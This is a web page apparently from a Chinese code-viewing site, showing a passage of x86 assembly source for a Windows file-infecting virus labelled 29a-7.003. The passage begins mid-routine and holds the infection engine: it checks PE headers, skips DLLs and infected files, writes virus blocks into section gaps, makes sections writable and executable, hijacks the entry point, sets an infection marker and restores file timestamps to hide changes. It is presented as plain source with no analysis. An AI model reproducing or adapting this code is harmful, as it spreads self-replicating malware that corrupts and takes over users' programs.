📄 29a-7.003
字号:
mov eax,BASPARAM
call GetFInfo
push dword ptr [ecx+4*8]
push large 80h ;FILE_ATTRIBUTE_NORMAL
pop edx
mov [ecx+4*8],edx
call SetFInfo
pop dword ptr [ecx+4*8]
cmp word ptr [esi+MEM_INF_POS],INF_SIGN ;check infected
jz NewNCF_1
;Check PE header
cmp word ptr [esi],'ZM'
jnz NewNCF_1
mov eax,[esi+3ch]
cmp eax,600h
ja NewNCF_1
add eax,esi
cmp word ptr [eax],'EP'
jnz NewNCF_1
test byte ptr [eax+16h+1],20h ;Is a DLL?
jnz NewNCF_1
mov bl,[eax+5ch] ;Subsystem
and bl,0feh
cmp bl,2
jnz NewNCF_1
;Check whether the file is a SFX(RAR file)
xor edi,edi
call get_section_of_rva
mov ecx,[edx+0ch]
add ecx,[edx+8]
mov esi,ecx
shr ecx,3
add ecx,esi
cmp ecx,38383838h
FileLen equ $-4
jna NewNCF_1
mov dword ptr [ebp+blk_min_size-NewNCF_IP],vir_first_blk_size+8
mov dword ptr [ebp+remaind_size-NewNCF_IP],VirSize
xor edx,edx
mov [ebp+BlkNum-NewNCF_IP],dl
cld
push eax
mov ecx,MAX_BLK_NUM*2
lea edi,[ebp+BlkBuf-NewNCF_IP]
xor eax,eax
rep stosd
pop eax
first_section:
movzx edx,word ptr [eax+14h]
lea edx,[eax+edx+18h+8-28h] ;->before first section header.VirtualSize
next_section:
add edx,28h
mov ecx,[edx] ;VirtualSize
mov edi,[edx+8] ;SizeOfRawData
cmp ecx,edi
jna short file_op_1
xchg edi,ecx
file_op_1:
add ecx,[edx+0ch]
mov edi,vir_first_blk_size+8+38h
call is_final_section
jz short inf_at_tail
mov edi,[edx+28h+0ch]
sub edi,ecx
cmp edi,vir_first_blk_size+8
blk_min_size equ $-4
;NOTE:Next section's PointerToRawData may be 0 or less than current PointerToRawData
;if so,don't use this section.So use jl instead of jc
jl goto_next_section
inf_at_tail:
;Some PE file's .BSS(uninitialized data) and .TLS section's PointerToRawData can be 0,it doesn't take
;disk space.If infect this kind of section,the file will be damaged.So must avoid it.
cmp dword ptr [edx+0ch],0 ;this section's PointerToRawData==0?
jz goto_next_section
xchg edi,ecx
xor ebx,ebx
mov bl,0
BlkNum equ $-1
mov [ebp+ebx*8+BlkPtr-NewNCF_IP],edi ;where to write
sub edi,[edx+0ch]
add edi,[edx+4]
add edi,8
mov [ebp+ebx*8+BlkBuf-NewNCF_IP],edi ;RVA to read
sub ecx,8
cmp ecx,[ebp+remaind_size-NewNCF_IP]
jl short file_op_8
mov ecx,[ebp+remaind_size-NewNCF_IP]
file_op_8:
sub [ebp+remaind_size-NewNCF_IP],ecx
mov [ebp+ebx*8+4+BlkBuf-NewNCF_IP],ecx ;how much bytes to write
mov bl,[ebp+BlkNum-NewNCF_IP]
or bl,bl ;is first block?
jnz file_op_2 ;No
; mov word ptr [ebp+ebx*8+2+BlkBuf-NewNCF_IP],INF_SIGN
or dword ptr [edx+1ch],00000020h or 00000040h or 10000000h or 20000000h or 40000000h or 80000000h ; modify section's Characteristics
mov ebx,[eax+28h] ;AddressOfEntryPoint
mov [ebp+host_entry_rva-NewNCF_IP],ebx ;save host code entry
mov [eax+28h],edi
add edi,(_start_ip-_start)
mov [ebp+host_section_rva-NewNCF_IP],edi ;save host code base
file_op_2:
mov dword ptr [ebp+blk_min_size-NewNCF_IP],INF_MIN_BLK_SIZE
mov ebx,[edx] ;VirtualSize
mov edi,[edx+8] ;SizeOfRawData
xor esi,esi
cmp ebx,edi
jna short file_op_3
xchg edi,ebx
inc esi
file_op_3:
add ebx,ecx
add ebx,8
file_op_4:
cmp ebx,edi ;is bigger one less than small one?
jna short file_op_5 ;no
add edi,[eax+3ch] ;FileAlignment
jmp short file_op_4
file_op_5:
or esi,esi
jz short file_op_6
xchg edi,ebx
file_op_6:
mov [edx],ebx
mov [edx+8],edi
or dword ptr [edx+1ch],00000040h or 40000000h; modify section's Characteristics
and dword ptr [edx+1ch],not 02020000 ;delete discardable Characteristics
inc byte ptr [ebp+BlkNum-NewNCF_IP]
goto_next_section:
mov ecx,VirSize
remaind_size equ $-4
jecxz file_op_ok
call is_final_section
jnz next_section
jmp first_section
file_op_ok:
xor edi,edi
call get_section_of_rva
;Round image size
mov ecx,[edx]
add ecx,[edx+4]
mov ebx,[eax+50h]
file_op_9:
cmp ecx,ebx
jbe short file_op_10
add ebx,[eax+38h]
jmp short file_op_9
file_op_10:
mov [eax+50h],ebx
;Round physical size
mov ecx,[edx+8]
add ecx,[edx+0ch]
mov [ebp+PhySize-NewNCF_IP],ecx
lea esi,[ebp+_start-NewNCF_IP]
xor ebx,ebx
xor edx,edx
WriteBlkLoop:
mov [ebp+TmpBuf-NewNCF_IP],ebx
mov eax,[ebp+edx*8+8+BlkBuf-NewNCF_IP]
mov [ebp+TmpBuf-NewNCF_IP],eax
mov eax,[ebp+edx*8+4+BlkBuf-NewNCF_IP]
mov [ebp+4+TmpBuf-NewNCF_IP],eax
push esi
push large 8
pop ecx
mov eax,[ebp+edx*8+BlkPtr-NewNCF_IP]
lea esi,[ebp+TmpBuf-NewNCF_IP]
call WriteToFile
pop esi
add eax,8
mov ecx,[ebp+edx*8+4+BlkBuf-NewNCF_IP]
call WriteToFile
add esi,ecx
inc edx
movzx ecx,byte ptr [ebp+BlkNum-NewNCF_IP]
cmp edx,ecx
jc WriteBlkLoop
lea esi,[ebp+VirBuf-NewNCF_IP]
push esi
mov word ptr [esi+MEM_INF_POS],INF_SIGN ;Set infected sign.
xor eax,eax
mov ecx,BUFSIZE
call WriteToFile
pop esi
;Englarge file if necessary
mov eax,STDPARAM
call GetFInfo
mov edx,82345678h
PhySize equ $-4
mov eax,edx
sub edx,[ecx+8]
jl EnglargeFile_1
cmp edx,BUFSIZE
ja EnglargeFile_1
xchg edx,ecx
call WriteToFile
EnglargeFile_1:
NewNCF_1:
mov eax,BASPARAM
call SetFInfo ;restore file time and attr
NewNCF_ret_2:
push dword ptr [ebp+hHandle-NewNCF_IP]
call [ebp+addrNtZwClose-NewNCF_IP]
NewNCF_ret_1:
dec byte ptr [ebp+IsBusy-NewNCF_IP]
NewNCF_ret:
popfd
popad
retn
;in--edx->current section VirtualSize,eax->PE base,ebx->base address,ebp->file_op_ip
;out--ZF set is final,ZF cleared isn't final
is_final_section:
pushad
mov ecx,edx
xor edi,edi
call get_section_of_rva
cmp ecx,edx
popad
retn
is_final_section_end:
;in--eax=offset,esi->buffer,ecx=size
WriteToFile:
pushad
mov dword ptr [ebp+PosInfo-NewNCF_IP],eax
mov dword ptr [ebp+4+PosInfo-NewNCF_IP],0
mov eax,POSPARAM
push ecx
call SetFInfo
pop ecx
xor eax,eax
push eax
push eax
push ecx
push esi
lea ecx,[ebp+temp-NewNCF_IP]
push ecx
push eax
push eax
push eax
push dword ptr [ebp+hHandle-NewNCF_IP]
call [ebp+addrZwWriteFile-NewNCF_IP]
popad
retn
;Get the section of a RVA
;in--eax=PE base,edi=RVA to find
;out--edx->section header.VirtualSize,ecx=0 means not found
;if not found,edx=>last section header.VirtualSize
get_section_of_rva:
push ecx
movzx edx,word ptr [eax+14h]
lea edx,[eax+edx+18h+8-28h] ;->before first section header.VirtualSize
movzx ecx,word ptr [eax+6]
inc ecx
get_section_of_rva_1:
dec ecx
jecxz get_section_of_rva_2
add edx,28h ;->VirtualSize
mov esi,[edx+4]; esi=VirtualAddress
cmp edi,esi ;RVA<VirtualAddress?
jc short get_section_of_rva_1
add esi,[edx]; esi=VirtualAddress+VirtualSize
cmp esi,edi;VirtualAddress+VirtualSize<RVA
jna short get_section_of_rva_1
get_section_of_rva_2:
or ecx,ecx
pop ecx
retn
get_section_of_rva_end:
;in--ah=infotype,al=len,high 16 bit=disp of info buffer and NewNCF_IP,ebp->NewNCF_IP
;out--ecx->info buffer
GetFInfo:
GetFInfo_IP equ NewNCF_IP
pushad
movzx ebx,ah
push ebx
movzx ebx,al
push ebx
shr eax,16
add eax,ebp
push eax
mov [esp+3*4+6*4],eax
lea ebx,[ebp+temp-GetFInfo_IP]
push ebx
push dword ptr [ebp+hHandle-GetFInfo_IP]
call [ebp+addrZwQueryInformationFile-GetFInfo_IP]
popad
retn
;in--ah=infotype,al=len,high 16 bit=disp of info buffer and NewNCF_IP,ebp->NewNCF_IP
;out--ecx->info buffer
SetFInfo:
SetFInfo_IP equ NewNCF_IP
pushad
movzx ebx,ah
push ebx
movzx ebx,al
push ebx
shr eax,16
add eax,ebp
push eax
mov [esp+3*4+6*4],eax
lea ebx,[ebp+temp-SetFInfo_IP]
push ebx
push dword ptr [ebp+hHandle-SetFInfo_IP]
call [ebp+addrZwSetInformationFile-SetFInfo_IP]
popad
retn
eax_to_lowcase:
push ecx
push large 4
pop ecx
eax_to_lowcase_0:
cmp al,'A'
jc eax_to_lowcase_1
cmp al,'Z'
ja eax_to_lowcase_1
add al,'a'-'A'
eax_to_lowcase_1:
ror eax,8
loop eax_to_lowcase_0
pop ecx
retn
VirSize equ $-_start
uninit_data:
align 4
temp db 32 dup (0)
TmpBuf db 8 dup (0)
PosInfo dd 0,0
BasInfo dd 0,0, 0,0, 0,0, 0,0, 0 ,0
StdInfo dd 0,0, 0,0, 0, 0, 0
align 4
FLen dd 0
BlkBuf dd 2*MAX_BLK_NUM dup (0)
BlkPtr dd MAX_BLK_NUM dup (0)
VirBuf db BUFSIZE dup (0)
if DEBUG
hexstr db 16 dup(0)
endif
MemSize equ $-_start
host:
push large 0
push offset cap
if 0
call nxt
if DEBUG
db 'Game over',0
else
db 'Released!!!',0
endif
nxt:
endif
push offset cap
push large 0
call MessageBoxA
push large 0
call ExitProcess
end _start
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -